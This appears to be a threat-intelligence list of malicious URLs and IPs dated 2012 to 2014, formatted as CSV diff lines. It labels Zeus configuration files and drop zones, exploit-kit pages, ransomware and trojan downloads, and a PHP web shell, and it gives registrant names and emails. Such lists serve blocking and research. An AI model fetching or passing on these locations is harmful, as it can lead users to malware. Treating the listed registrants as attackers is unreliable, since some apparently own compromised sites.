+"2012/04/12_15:12","-","69.194.192.229/q.php?f=7245d&e=2","-","Zeus trojan","-","14670","0","US", +"2012/04/12_20:21","-","91.195.254.71/?a8b15ffc5b06664b1e119cc1c6942b3d","-","trojan 
Ransom message text","-","43997","0","RU", +"2012/04/16_14:40","police11.provenprotection.net/?1284cf325cf33aa48aeb29aee89b3473","91.195.254.86","-","Ransom message text","Michelle Arney / -","43997","0","RU", +"2012/04/16_14:40","-","91.195.254.86/?1284cf325cf33aa48aeb29aee89b3473","-","Ransom message text","-","43997","0","RU", +"2012/04/16_14:40","-","91.195.254.74/?b933de68eae80dadb34b9d4b889575eb","-","Ransom message text","-","43997","0","RU", +"2012/04/20_15:11","-","91.196.216.64/s.php?ref=referrer&cls=colorDepth&sw=width&sh=height&dc=charset&lc=location&ua=userAgent","-","Exploit","-","43239","0","RU", +"2012/04/30_16:15","-","91.223.223.244/c.bin","91.223.223.244.hostpro.com.ua.","zeus config file","-","21219","0","UA", +"2012/04/30_16:15","-","91.223.223.244/b.php","91.223.223.244.hostpro.com.ua.","zeus drop zone","-","21219","0","UA", +"2012/04/30_16:15","-","188.40.168.128/c.bin","static.128.168.40.188.clients.your-server.de.","zeus config file","-","24940","0","DE", +"2012/04/30_16:15","-","188.40.168.128/b.php","static.128.168.40.188.clients.your-server.de.","zeus drop zone","-","24940","0","DE", +"2012/05/02_13:48","-","194.183.224.73/out/out.htm","www.van-helden.net.","Java exploits serves Poison Ivy","-","5463","0","BE", +"2012/05/05_12:32","-","46.166.146.110/","-","AnonJDB Control Panel","-","57668","0","GB", +"2012/05/06_18:07","www8.0zz0.com/2012/05/05/18/394995639.gif","70.38.12.107","-","trojan Ransom","Arabic-web / -","32613","0","CA", +"2012/05/06_18:07","www12.0zz0.com/2012/05/06/00/464591666.gif","67.205.89.53","-","trojan","Arabic-web / -","32613","0","CA", +"2012/05/07_13:49","-","91.202.244.89/files/957f2","-","Ransom WindowsSecurity","-","44784","0","UA", +"2012/05/07_13:49","-","91.202.244.89/files/a69fa","-","Ransom WindowsSecurity","-","44784","0","UA", +"2012/05/07_13:49","-","91.202.244.89/files/bdd35","-","Ransom WindowsSecurity","-","44784","0","UA", 
+"2012/05/07_21:32","-","91.202.244.89/files/957f2","-","Ransom.WindowsSecurity","-","44784","0","UA", +"2012/05/07_21:32","-","91.202.244.89/files/a69fa","-","Ransom.WindowsSecurity","-","44784","0","UA", +"2012/05/07_21:32","-","91.202.244.89/files/bdd35","-","Ransom.WindowsSecurity","-","44784","0","UA", +"2012/05/10_12:55","-","91.202.244.89/files/920b8","-","Ransom WindowsSecurity","-","44784","0","UA", +"2012/05/10_12:55","-","91.202.244.89/files/443aa","-","Ransom WindowsSecurity","-","44784","0","UA", +"2014/03/23_10:15","metrocuadro.com.ve/coolest/2013googledocs/","66.111.47.8","cinaruco.tepuyserver.net.","Backdoor.IRCBot","-","21840","0","US", +"2014/03/23_10:15","www.petpleasers.ca/templates/rhuk_milkyway/images/red/sll.exe","66.49.201.136","-","Trojan.Dropper","-","33139","0","CA", +"2012/05/31_21:49","-","184.154.76.237/search.php?q=fa16f5d3def51288","184.154.76.237.virtualsrv.com.","Exploit","-","32475","0","US", +"2012/05/31_21:49","dimenal.com.br/cUEDN4w2/index.html?s=883&lid=2267&elq=11f7b1b5179f45b09737bdf10d0fe61f","187.19.96.13","server03.certto.com.br.","Leads to exploit kits","antonio sestito sobrinho / dimenal@hotmail.com","28130","0","BR", +"2012/05/31_21:49","dimenal.com.br/HHv0oxBP/index.html?s=883&lid=2298&elq=11f7b1b5179f45b09737bdf10d0fe61f","187.19.96.13","server03.certto.com.br.","Leads to exploit kits","antonio sestito sobrinho / dimenal@hotmail.com","28130","0","BR", +"2014/03/23_10:15","-","203.172.131.99/personal/?name=download&file=readdownload&id=8","-","VBScript.Drive-by, Backdoor.IRCBot","-","23974","0","TH", +"2014/03/23_10:15","-","203.172.131.99/personal/?name=download&file=readdownload&id=9","-","VBScript.Drive-by, Backdoor.IRCBot","-","23974","0","TH", +"2014/03/23_10:15","-","203.172.131.99/personal/?name=download&file=readdownload&id=6","-","VBScript.Drive-by, Backdoor.IRCBot","-","23974","0","TH", +"2014/03/23_10:15","-","203.172.131.99/personal/?name=download&file=readdownload&id=7","-","VBScript.Drive-by, 
Backdoor.IRCBot","-","23974","0","TH", +"2014/03/23_10:15","-","203.172.131.99/personal/?name=download&file=readdownload&id=5","-","VBScript.Drive-by, Backdoor.IRCBot","-","23974","0","TH", +"2014/03/23_10:15","-","203.172.131.99/personal/?name=download&file=readdownload&id=3","-","VBScript.Drive-by, Backdoor.IRCBot","-","23974","0","TH", +"2014/03/23_10:15","-","203.172.131.99/personal/?name=download&file=readdownload&id=4","-","VBScript.Drive-by, Backdoor.IRCBot","-","23974","0","TH", +"2012/05/31_21:49","miespaciopilates.com/7Fy2FzNg/index.html","69.61.18.58","linux51.webhosting-network-services.com.","Leads to exploit kits","Pablo Pianetti / -","22653","0","US", +"2012/05/31_21:49","puenteaereo.info/fHA5c5iw/index.html?s=883&lid=2231&elq=11f7b1b5179f45b09737bdf10d0fe61f","50.22.86.10","50.22.86.10-static.reverse.softlayer.com.","Leads to exploit kits","Laura Margolis / laura@areasur.com.uy","36351","0","US", +"2012/05/31_21:49","puenteaereo.info/fHA5c5iw/index.html?s=883&lid=2270&elq=11f7b1b5179f45b09737bdf10d0fe61f","50.22.86.10","50.22.86.10-static.reverse.softlayer.com.","Leads to exploit kits","Laura Margolis / laura@areasur.com.uy","36351","0","US", +"2012/05/31_21:49","puenteaereo.info/KE3pt5Ye/index.html?s=883&lid=2328&elq=11f7b1b5179f45b09737bdf10d0fe61f","50.22.86.10","50.22.86.10-static.reverse.softlayer.com.","Leads to exploit kits","Laura Margolis / laura@areasur.com.uy","36351","0","US", +"2014/03/23_10:15","-","203.172.131.99/personal/?name=download&file=readdownload&id=12","-","VBScript.Drive-by, Backdoor.IRCBot","-","23974","0","TH", +"2014/03/23_10:15","-","203.172.131.99/personal/?name=download&file=readdownload&id=11","-","VBScript.Drive-by, Backdoor.IRCBot","-","23974","0","TH", +"2012/06/01_21:45","-","95.163.104.80/spielberg/start.php","-","Ransom message text","-","12695","0","RU", +"2014/03/21_13:13","zjjlf.croukwexdbyerr.net/zyso.cgi?16","66.96.195.49","66-96-195-49.static.hostnoc.net.","redirects to exploit kit","Registrar Abuse 
Contact abuse@web.com","21788","0","US", +"2012/06/19_07:03","www.panazan.ro/online/libraries/pattemplate/patTemplate/Modifier/HTML/im/o/z/3pingo/cfg.bin","89.42.216.47","server20.whmpanels.com.","zeus config file","-","5606","0","RO", +"2012/06/19_07:03","www.panazan.ro/online/libraries/pattemplate/patTemplate/Modifier/HTML/im/o/z/3pingo/gate.php","89.42.216.47","server20.whmpanels.com.","zeus drop zone","-","5606","0","RO", +"2014/03/21_09:24","www.two-of-us.at/images/W.exe","85.158.181.11","server143-han.de-nserver.de.","Trojan.FakeFlash","Engelbert Kronsteiner / office@pch.at","34432","0","DE", +"2012/06/21_19:08","-","216.18.228.149/~anon/jdb/inf.php?id=455cec1f823b2f0a13dd26655ac6bcfa","-","Java drive-by","-","33569","0","US", +"2012/06/26_05:59","ns1.updatesdns.org/static.htmls","46.17.102.124","node-46.17.102.124.reverse.x4b.org.","zeus config file","cao yang / zxhxnjsgh@126.com","49335","0","RU", +"2014/03/21_09:24","www.two-of-us.at/images/vein.exe","85.158.181.11","server143-han.de-nserver.de.","Trojan.FakeFlash","Engelbert Kronsteiner / office@pch.at","34432","0","DE", +"2012/06/28_21:29","-","91.223.82.58/~rivernig/19/config.bin","-","Zeus config file","-","51430","0","NL", +"2012/06/28_21:29","-","91.223.82.58/~rivernig/19/gate.php","-","Zeus drop zone","-","51430","0","NL", +"2012/06/29_21:50","-","188.190.98.132/ph/dmg5.php?i=8","ip-188-190-98-132.hosted-in.infiumhost.com.","trojan Gataka","-","197145","0","UA", +"2014/03/21_09:24","www.two-of-us.at/images/s4x.exe","85.158.181.11","server143-han.de-nserver.de.","Trojan.FakeFlash","Engelbert Kronsteiner / office@pch.at","34432","0","DE", +"2014/03/21_09:24","www.two-of-us.at/images/s2x.exe","85.158.181.11","server143-han.de-nserver.de.","Trojan.FakeFlash","Engelbert Kronsteiner / office@pch.at","34432","0","DE", +"2012/07/03_13:17","wetjane.x10.mx/","69.175.121.66","boru.x10hosting.com.","Java exploit","x10 Hosting / % by email at ayuda@nic.mx .","32475","0","US", 
+"2012/07/03_13:43","-","69.162.82.26/version2/webber/1/config.bin","26-82-162-69.static.reverse.lstn.net.","Zeus config file","-","46475","0","US", +"2012/07/03_13:43","-","69.162.82.26/version2/webber/1/gate.php","26-82-162-69.static.reverse.lstn.net.","Zeus drop zone","-","46475","0","US", +"2012/07/05_12:06","-","91.202.244.122/files/2f646","-","Ransom WindowsSecurity","-","44784","0","UA", +"2012/07/05_12:06","-","91.202.244.122/files/2c753","-","Ransom WindowsSecurity","-","44784","0","UA", +"2012/07/05_12:06","-","91.202.244.122/files/36cf4","-","Ransom WindowsSecurity","-","44784","0","UA", +"2012/07/14_19:38","-","109.163.225.232/download.php?id=25","lh17626.limehost.ro.","Trojan","-","39743","0","RO", +"2012/07/15_00:08","-","203.63.5.190/2m0AZfuu/WM4.exe","24x7Shop.cyberefficiency.com.au.","Trojan","-","2764","0","AU", +"2014/03/21_09:24","www.two-of-us.at/images/s2.exe","85.158.181.11","server143-han.de-nserver.de.","Trojan.FakeFlash","Engelbert Kronsteiner / office@pch.at","34432","0","DE", +"2014/03/21_09:24","www.two-of-us.at/images/m.exe","85.158.181.11","server143-han.de-nserver.de.","Trojan.FakeFlash","Engelbert Kronsteiner / office@pch.at","34432","0","DE", +"2014/03/21_09:24","www.two-of-us.at/images/digitalcoinminer.exe","85.158.181.11","server143-han.de-nserver.de.","Trojan.FakeFlash","Engelbert Kronsteiner / office@pch.at","34432","0","DE", +"2014/03/21_09:24","www.two-of-us.at/images/dgc4x.exe","85.158.181.11","server143-han.de-nserver.de.","Trojan.FakeFlash","Engelbert Kronsteiner / office@pch.at","34432","0","DE", +"2014/03/21_09:24","www.two-of-us.at/images/dc.exe","85.158.181.11","server143-han.de-nserver.de.","Trojan.FakeFlash","Engelbert Kronsteiner / office@pch.at","34432","0","DE", +"2012/07/20_23:08","elew72isst.rr.nu/mm.php?d=x1","194.28.115.150","h150-115.net.lan-rybnitsa.com.","Leads to Fake AV","InfoRelay abuse@sitelutions.com","48691","0","MD", 
+"2014/03/21_09:24","www.two-of-us.at/images/bz.exe","85.158.181.11","server143-han.de-nserver.de.","Trojan.FakeFlash","Engelbert Kronsteiner / office@pch.at","34432","0","DE", +"2014/03/21_09:24","www.two-of-us.at/images/BR.exe","85.158.181.11","server143-han.de-nserver.de.","Trojan.FakeFlash","Engelbert Kronsteiner / office@pch.at","34432","0","DE", +"2014/03/21_09:24","www.two-of-us.at/images/aurcoinlab.exe","85.158.181.11","server143-han.de-nserver.de.","Trojan.FakeFlash","Engelbert Kronsteiner / office@pch.at","34432","0","DE", +"2012/08/30_06:59","www.perupuntocom.com/claroideas.exe","68.178.254.187","p3slh042.shr.phx3.secureserver.net.","trojan","Registercom / domainregistrar@register.com","26496","0","US", +"2014/03/21_09:24","www.two-of-us.at/images/au4x.exe","85.158.181.11","server143-han.de-nserver.de.","Trojan.FakeFlash","Engelbert Kronsteiner / office@pch.at","34432","0","DE", +"2012/10/24_20:51","xamateurpornlic.www1.biz/latest/xxx-porn-movie.avi.exe","94.199.53.203","ded-srv-pool-53-203.23net.hu.","trojan ZeroAccess/Sirefef","ChangeIP Network Operations / noc@changeip.com","30836","0","HU", +"2012/10/26_23:28","-","69.55.49.159/Ice/index.php","-","exploit kit","-","46652","0","US", +"2012/10/26_23:28","-","69.55.49.159/config.bin","-","Zeus config file","-","46652","0","US", +"2012/10/26_23:28","-","69.55.49.159/gate.php","-","Zeus drop zone","-","46652","0","US", +"2014/03/21_09:24","www.two-of-us.at/images/1.exe","85.158.181.11","server143-han.de-nserver.de.","Trojan.FakeFlash","Engelbert Kronsteiner / office@pch.at","34432","0","DE", +"2014/03/21_09:24","www.two-of-us.at/images/pictures.php","85.158.181.11","server143-han.de-nserver.de.","PHP.Shell","Engelbert Kronsteiner / office@pch.at","34432","0","DE", +"2012/11/13_10:00","-","61.19.251.27/web/cb.php","-","CrimeBoss exploit kit","-","9931","0","TH", +"2014/03/13_18:46","milleniumpapelaria.com.br/tag/class/editor.php?edit=gz","192.185.213.84","-","exploit kit","MARLON DURAES BIAZIN / 
m_biazin@hotmail.com","20013","0","US", +"2012/11/18_15:21","xpornstarsckc.ddns.name/latest/xxx-porn-movie.avi.exe","94.199.53.203","ded-srv-pool-53-203.23net.hu.","trojan","-","30836","0","HU", +"2012/11/19_07:51","natural.buckeyeenergyforum.com/r/l/the-joint.php","193.0.179.20","frolov4me.biz.","Cool exploit kit","Domains By Proxy, LLC / -","57062","0","RU", +"2012/11/19_07:51","narrow.azenergyforum.com/r/l/brown_season.php","193.0.179.20","frolov4me.biz.","Cool exploit kit","Domains By Proxy, LLC / -","57062","0","RU", +"2012/11/19_18:52","-","209.236.67.163/8bd7d5194/wergwrg3gwer","209.236.67.163.static.westdc.net.","trojan","-","29854","0","US", +"2012/11/19_18:52","upswings.net/track.php?c005","174.120.146.138","shared0003.apthost.com.","redirects to exploit kit","hello@flirt-with.me.uk","21844","0","US", +"2012/11/19_18:52","www.lyzgs.com/track.php?c005","203.158.16.75","-","redirects to exploit kit","qinxianyuechaojinshuzhipinyouxiangongsi / cangzhouyouhua@163.com","17964","0","CN", +"2012/11/19_18:52","weboxmedia.by/track.php?c005","77.222.40.74","-","redirects to exploit kit","-","44112","0","RU", +"2012/11/22_12:32","ukrfarms.com.ua/images/tovar.jpg.php","213.227.207.89","h1-kv.alkar.net.","iframe leads to CritXPack exploit kit","registry@vegatele.com","6703","0","UA", +"2012/11/22_12:32","babos.scrapping.cc/v211112n/i.php?token=forum","62.76.47.12","62-76-47-12.clodo.ru.","CritXPack exploit kit","-","48172","0","RU", +"2012/11/23_07:35","mlpoint.pt/Scripts/d.html","81.88.48.97","-","obfuscated iframe leads to Nuclear exploit kit","ML POINT - COMUNICAÇÃO E IMAGEM, UNIPESSOAL LDA / mariotm@sapo.pt","39729","0","IT", +"2012/11/25_18:48","gravityexp.com/go.php?sid=12","46.163.117.144","lvps46-163-117-144.dedicated.hosteurope.de.","redirects to exploit kit","cristina giordani / francesca.muglia.130@istruzione.it","20773","0","DE", +"2012/11/26_08:23","-","85.143.166.181/t221112d/i.php?token=default","85-143-166-181.clodo.ru.","CritXPack exploit 
kit","-","56534","0","RU", +"2012/11/27_10:18","winlock.usa.cc/k8uiaii89819aj/get.php?f=7","109.163.231.219","lh20422.voxility.net.","backdoor","-","39743","0","RO", +"2012/12/02_21:28","-","212.84.187.68/job.php?php=receipt","68-187.skymarket.net.uk.","trojan inside zip file","-","20860","0","GB", +"2014/03/13_12:51","dev.wrathofshadows.net/255163377.htm","98.131.229.2","rev.opentransfer.com.2.229.131.98.in-addr.arpa.","exploit kit","Registrar Abuse Contact domainabuse@tucows.com","32392","0","US", +"2012/12/10_09:06","analxxxclipsyjh.dnset.com/latest/amateur_dog_sex_01.avi.exe","94.199.53.203","ded-srv-pool-53-203.23net.hu.","trojan","Network Operations, ChangeIP / noc@changeip.com","30836","0","HU", +"2012/12/10_15:48","private.hotelcesenaticobooking.info/r/l/updating-bugs_keeping.php","93.190.43.44","-","Cool exploit kit","Ivano Di Biasi / ryhab@ryhab.com","6849","0","UA", +"2012/12/21_02:03","port.bg/wfgv.html?php=receipt","91.196.124.59","host124-59.superhosting.bg.","Redirects to exploit","-","8262","0","BG", +"2012/12/26_19:46","webordermanager.com","98.124.199.1","redirector-sjl.enom.com.","Redirects to exploit","AMA Holding / aanelli@yahoo.com","21740","0","US", +"2012/12/26_19:46","videoflyover.com","98.124.198.1","redirector-ash.enom.com.","redirects to exploit","AMA Holding / aanelli@yahoo.com","21740","0","US", +"2013/01/04_18:06","-","82.113.204.228:8080/get/lite.dll.crp","-","malware calls home","-","30848","0","IT", +"2014/03/11_22:39","www.0uk.net/zaaqw/Pony.exe","178.211.53.17","server-178.211.53.17.as42926.net.","Trojan.Pony","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","42926","0","TR", +"2013/01/05_20:04","cwmgaming.com","198.27.64.67","ns4004653.ip-198-27-64.net.","iFrames to Exploit","979 Ventures / -","16276","0","CA", +"2014/03/11_22:39","www.0uk.net/zaaqw/cs.exe","178.211.53.17","server-178.211.53.17.as42926.net.","Trojan.Pony","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","42926","0","TR", 
+"2014/03/11_22:39","ukonline.hc0.me/new.exe","5.135.127.68","-","Win32/Injector.Autoit.ABQ trojan","WhoisGuard Protected / 630ca54ebc794d67bd94109ac2190e52.protect@whoisguard.com","16276","0","FR", +"2013/01/11_07:08","50efa6486f1ef.skydivesolutions.be/news/refusal/natural.cgi","93.189.40.173","-","Cool exploit kit","Not shown, please visit www.dns.be for webbased whois. / support@key-systems.net","41853","0","RU", +"2014/03/11_22:39","ukonline.hc0.me/Host.exe","5.135.127.68","-","Win32/Spy.Agent.NYU trojan","WhoisGuard Protected / 630ca54ebc794d67bd94109ac2190e52.protect@whoisguard.com","16276","0","FR", +"2013/01/18_08:22","-","66.230.143.147/it/","-","Dialler.GlobalAccess","-","23393","0","US", +"2014/03/11_22:39","somethingnice.hc0.me/Miner/CPUMiner.files","5.135.127.68","-","Trojan.PlasmaRAT.Miner","WhoisGuard Protected / 630ca54ebc794d67bd94109ac2190e52.protect@whoisguard.com","16276","0","FR", +"2013/01/26_00:14","-","78.110.62.95/airyoleg.php?boutfage=889821","95-62-110-78.net.hts.ru.","Impact exploit kit","-","31240","0","RU", +"2013/01/26_00:14","-","78.110.62.95/jentrate.php","95-62-110-78.net.hts.ru.","Part of Impact exploit kit","-","31240","0","RU", +"2013/01/26_00:14","-","78.110.62.95/jeanfage/aimoping.jar","95-62-110-78.net.hts.ru.","Part of Impact exploit kit","-","31240","0","RU", +"2013/01/26_00:14","-","78.110.62.95/jeanfage/jokevity.jar","95-62-110-78.net.hts.ru.","Part of Impact exploit kit","-","31240","0","RU", +"2013/01/26_00:14","-","78.110.62.95/jeanfage/test.jar","95-62-110-78.net.hts.ru.","Part of Impact exploit kit","-","31240","0","RU", +"2014/03/11_22:39","directxex.com/uploads/965775728.crypt.exe","108.162.199.96","-","Win32/Spy.Zbot.AAQ trojan","Registrar Abuse Contact abuse@enom.com","13335","0","US", +"2014/03/11_22:39","directxex.com/uploads/813441197.ms.exe?dl=1813441197.ms.exe","108.162.199.96","-","Backdoor.Win32.Androm.bwzj","Registrar Abuse Contact abuse@enom.com","13335","0","US", 
+"2014/03/11_22:39","directxex.com/uploads/565785830.been.exe","108.162.199.96","-","MSIL/Injector.CSR trojan","Registrar Abuse Contact abuse@enom.com","13335","0","US", +"2014/03/11_22:39","directxex.com/uploads/482862824.kmahard.exe","108.162.198.96","-","MSIL/Injector.CUX trojan","Registrar Abuse Contact abuse@enom.com","13335","0","US", +"2014/03/11_22:39","directxex.com/uploads/472678730.2113899106.puttymanager.exe","108.162.198.96","-","Win32/TrojanDropper.VB.OJG trojan","Registrar Abuse Contact abuse@enom.com","13335","0","US", +"2014/03/11_22:39","directxex.com/uploads/39164388.ms.exe?dl=1","108.162.198.96","-","Win32/Injector.AYKD trojan","Registrar Abuse Contact abuse@enom.com","13335","0","US", +"2014/03/11_22:39","directxex.com/uploads/341043287.crypted.exe","108.162.198.96","-","Win32/Injector.AYNZ trojan","Registrar Abuse Contact abuse@enom.com","13335","0","US", +"2014/03/11_22:39","directxex.com/uploads/2056064399.ms.exe","108.162.198.96","-","Backdoor.Win32.Androm.bwzj","Registrar Abuse Contact abuse@enom.com","13335","0","US", +"2014/03/11_22:39","directxex.com/uploads/1870347935.http.exe","108.162.198.96","-","MSIL/Injector.CSR trojan","Registrar Abuse Contact abuse@enom.com","13335","0","US", +"2014/03/11_22:39","directxex.com/uploads/1835173533.ms.exe?dl=11835173533.ms.exe","108.162.198.96","-","Backdoor.Win32.Androm.bwzj","Registrar Abuse Contact abuse@enom.com","13335","0","US", +"2013/02/11_08:24","www.offerent.com/tmp/5lro65.php?receipt_print=825_417011330","200.58.119.30","texila.dattaweb.com.","trojan inside zip file","www.offerent.com / walterpbook@gmail.com","27823","0","AR", +"2014/03/11_22:39","directxex.com/uploads/1803412028.mintt.exe","108.162.199.96","-","Win32/Injector.AYNZ trojan","Registrar Abuse Contact abuse@enom.com","13335","0","US", +"2014/03/11_22:39","directxex.com/uploads/1491944748.whaat.exe","108.162.199.96","-","Gen:Variant.Strictor.51736","Registrar Abuse Contact abuse@enom.com","13335","0","US", 
+"2014/03/11_22:39","directxex.com/uploads/1599687595.ms.exe?dl=11599687595.ms.exe","108.162.199.96","-","Backdoor.Win32.Androm.bwzj","Registrar Abuse Contact abuse@enom.com","13335","0","US", +"2013/03/13_14:46","mycleanpc.tk/download/","31.170.163.144","-","leads to malicious download on Mediafire","abuse@dot.tk","47583","0","US", +"2013/03/20_09:36","bbs.bjchun.com/report.htm","115.47.69.193","-","redirects to exploit kit","chunsheying@163.com","17964","0","CN", +"2013/03/20_12:34","customsboysint.com/1/25/human-head-wireframe","72.167.131.8","p3slh153.shr.phx3.secureserver.net.","redirecting to Sweet Orange exploit kit with Google referrer","hendrick faria / -","26496","0","US", +"2014/03/11_22:39","directxex.com/uploads/1271351103.ms.exe?dl=1","108.162.199.96","-","Backdoor.Win32.Androm.bwzj","Registrar Abuse Contact abuse@enom.com","13335","0","US", +"2014/03/11_22:39","directxex.com/uploads/1271351103.ms.exe","108.162.199.96","-","Backdoor.Win32.Androm.bwzj","Registrar Abuse Contact abuse@enom.com","13335","0","US", +"2013/04/07_09:31","www.daspar.net/components/.kkcpgr.php?action=ss00_323","176.9.90.164","stegro-cos-mpr-200.unaxus.net.","Trojan.Krypt","artesima@gmx.ch","24940","0","DE", +"2013/04/16_00:32","freefblikes.phpnet.us","209.190.85.252","www.quark.byethost4.com.","VBScript.Trojan.IRC","Administrator Administrator / hostorgadmin@googlemail.com","10297","0","US", +"2013/04/17_08:58","-","61.63.123.44/news.html","61-63-123-44.nty.dynamic.tbcnet.net.tw.","iframe leads to Java exploit","-","4780","0","TW", +"2014/03/11_22:39","directxex.com/uploads/1005443056.cryptedserver.exe","108.162.198.96","-","Win32/TrojanDropper.VB.OJG trojan","Registrar Abuse Contact abuse@enom.com","13335","0","US", +"2013/05/06_09:50","-","198.50.194.26/statistic/increases/street_throwing_keeps.php","-","exploit kit","-","16276","0","CA", +"2013/05/10_17:35","-","5.135.115.193:8080/get/e3943d7369aa6add911aca18b3a507f4.exe","serv2-am.com.","trojan","-","16276","0","FR", 
+"2013/05/10_17:35","-","5.135.115.194:8080/get/e3943d7369aa6add911aca18b3a507f4.exe","serv1-am-mta.com.","trojan","-","16276","0","FR", +"2013/05/10_17:35","-","5.135.115.195:8080/get/e3943d7369aa6add911aca18b3a507f4.exe","mta1.serv1-am-mta.com.","trojan","-","16276","0","FR", +"2013/05/10_17:35","-","5.135.115.196:8080/get/e3943d7369aa6add911aca18b3a507f4.exe","mta2.serv1-am-mta.com.","trojan","-","16276","0","FR", +"2013/05/10_17:35","-","5.135.115.197:8080/get/e3943d7369aa6add911aca18b3a507f4.exe","mta3.serv1-am-mta.com.","trojan","-","16276","0","FR", +"2013/05/10_17:35","-","5.135.115.198:8080/get/e3943d7369aa6add911aca18b3a507f4.exe","mta4.serv1-am-mta.com.","trojan","-","16276","0","FR", +"2013/05/10_17:35","-","5.135.115.199:8080/get/e3943d7369aa6add911aca18b3a507f4.exe","mta5.serv1-am-mta.com.","trojan","-","16276","0","FR", +"2013/05/10_17:35","-","5.135.115.100:8080/get/e3943d7369aa6add911aca18b3a507f4.exe","-","trojan","-","16276","0","FR", +"2013/05/10_17:35","-","5.135.115.201:8080/get/e3943d7369aa6add911aca18b3a507f4.exe","mta7.serv1-am-mta.com.","trojan","-","16276","0","FR", +"2013/05/10_17:35","-","5.135.115.202:8080/get/e3943d7369aa6add911aca18b3a507f4.exe","mta8.serv1-am-mta.com.","trojan","-","16276","0","FR", +"2013/05/10_17:35","-","5.135.115.203:8080/get/e3943d7369aa6add911aca18b3a507f4.exe","mta9.serv1-am-mta.com.","trojan","-","16276","0","FR", +"2013/05/10_17:35","-","5.135.115.204:8080/get/e3943d7369aa6add911aca18b3a507f4.exe","mta10.serv1-am-mta.com.","trojan","-","16276","0","FR", +"2013/05/10_17:35","-","5.135.115.205:8080/get/e3943d7369aa6add911aca18b3a507f4.exe","mta11.serv1-am-mta.com.","trojan","-","16276","0","FR", +"2013/05/10_17:35","-","5.135.115.206:8080/get/e3943d7369aa6add911aca18b3a507f4.exe","mta12.serv1-am-mta.com.","trojan","-","16276","0","FR", +"2013/05/10_17:35","-","5.135.115.207:8080/get/e3943d7369aa6add911aca18b3a507f4.exe","mta13.serv1-am-mta.com.","trojan","-","16276","0","FR", 
+"2013/05/10_17:35","-","5.135.115.208:8080/get/e3943d7369aa6add911aca18b3a507f4.exe","mta14.serv1-am-mta.com.","trojan","-","16276","0","FR", +"2013/05/10_17:35","-","5.135.115.209:8080/get/e3943d7369aa6add911aca18b3a507f4.exe","mta15.serv1-am-mta.com.","trojan","-","16276","0","FR", +"2013/05/10_17:35","-","5.135.115.210:8080/get/e3943d7369aa6add911aca18b3a507f4.exe","mta16.serv1-am-mta.com.","trojan","-","16276","0","FR", +"2013/05/10_17:35","-","5.135.115.211:8080/get/e3943d7369aa6add911aca18b3a507f4.exe","mta17.serv1-am-mta.com.","trojan","-","16276","0","FR", +"2013/05/10_17:35","-","5.135.115.212:8080/get/e3943d7369aa6add911aca18b3a507f4.exe","mta18.serv1-am-mta.com.","trojan","-","16276","0","FR", +"2013/05/10_17:35","-","5.135.115.213:8080/get/e3943d7369aa6add911aca18b3a507f4.exe","mta19.serv1-am-mta.com.","trojan","-","16276","0","FR", +"2013/05/10_17:35","-","5.135.115.214:8080/get/e3943d7369aa6add911aca18b3a507f4.exe","mta20.serv1-am-mta.com.","trojan","-","16276","0","FR", +"2013/05/10_17:35","-","5.135.115.215:8080/get/e3943d7369aa6add911aca18b3a507f4.exe","mta21.serv1-am-mta.com.","trojan","-","16276","0","FR", +"2013/05/10_17:35","-","5.135.115.216:8080/get/e3943d7369aa6add911aca18b3a507f4.exe","mta22.serv1-am-mta.com.","trojan","-","16276","0","FR", +"2013/05/10_17:35","-","5.135.115.217:8080/get/e3943d7369aa6add911aca18b3a507f4.exe","mta23.serv1-am-mta.com.","trojan","-","16276","0","FR", +"2013/05/10_17:35","-","5.135.115.218:8080/get/e3943d7369aa6add911aca18b3a507f4.exe","mta24.serv1-am-mta.com.","trojan","-","16276","0","FR", +"2013/05/10_17:35","-","5.135.115.219:8080/get/e3943d7369aa6add911aca18b3a507f4.exe","mta25.serv1-am-mta.com.","trojan","-","16276","0","FR", +"2013/05/10_17:35","-","5.135.115.220:8080/get/e3943d7369aa6add911aca18b3a507f4.exe","mta26.serv1-am-mta.com.","trojan","-","16276","0","FR", 
+"2013/05/10_17:35","-","5.135.115.221:8080/get/e3943d7369aa6add911aca18b3a507f4.exe","mta27.serv1-am-mta.com.","trojan","-","16276","0","FR", +"2013/05/10_17:35","-","5.135.115.222:8080/get/e3943d7369aa6add911aca18b3a507f4.exe","mta28.serv1-am-mta.com.","trojan","-","16276","0","FR", +"2013/05/10_17:35","-","78.110.162.72:8080/get/e3943d7369aa6add911aca18b3a507f4.exe","78-110-162-72.rdns.ldni.net.","trojan","-","42831","0","GB", +"2013/05/10_17:35","-","78.110.162.73:8080/get/e3943d7369aa6add911aca18b3a507f4.exe","78-110-162-73.rdns.ldni.net.","trojan","-","42831","0","GB", +"2013/05/10_17:35","-","78.110.162.79:8080/get/e3943d7369aa6add911aca18b3a507f4.exe","78-110-162-79.rdns.ldni.net.","trojan","-","42831","0","GB", +"2013/05/10_17:35","-","94.23.38.214:8080/get/e3943d7369aa6add911aca18b3a507f4.exe","ns368891.ovh.net.","trojan","-","16276","0","FR", +"2013/05/10_17:35","-","217.8.253.250:8080/get/e3943d7369aa6add911aca18b3a507f4.exe","mail.trcontents.co.uk.","trojan","-","20738","0","GB", +"2013/05/10_17:35","-","103.4.218.22:8080/get/e3943d7369aa6add911aca18b3a507f4.exe","-","trojan","-","131472","0","TH", +"2013/05/10_17:35","-","85.214.133.237:8080/get/e3943d7369aa6add911aca18b3a507f4.exe","gamelevel.de.","trojan","-","6724","0","DE", +"2013/05/10_17:35","-","94.23.38.214:8080/get/e3943d7369aa6add911aca18b3a507f4.exe","ns368891.ovh.net.","trojan","-","16276","0","FR", +"2013/05/10_17:35","-","180.235.132.29:8080/get/e3943d7369aa6add911aca18b3a507f4.exe","-","trojan","-","55639","0","HK", +"2013/05/10_17:35","-","208.88.5.229:8080/get/e3943d7369aa6add911aca18b3a507f4.exe","d05805e4.powerprojct.ca.","trojan","-","36218","0","CA", +"2013/05/10_17:35","-","66.175.218.117:8080/get/e3943d7369aa6add911aca18b3a507f4.exe","li513-117.members.linode.com.","trojan","-","6939","0","US", +"2013/05/12_14:55","-","103.4.218.22:8080//get/e3943d7369aa6add911aca18b3a507f4.exe","-","Trojan.FakeAlert","-","131472","0","TH", 
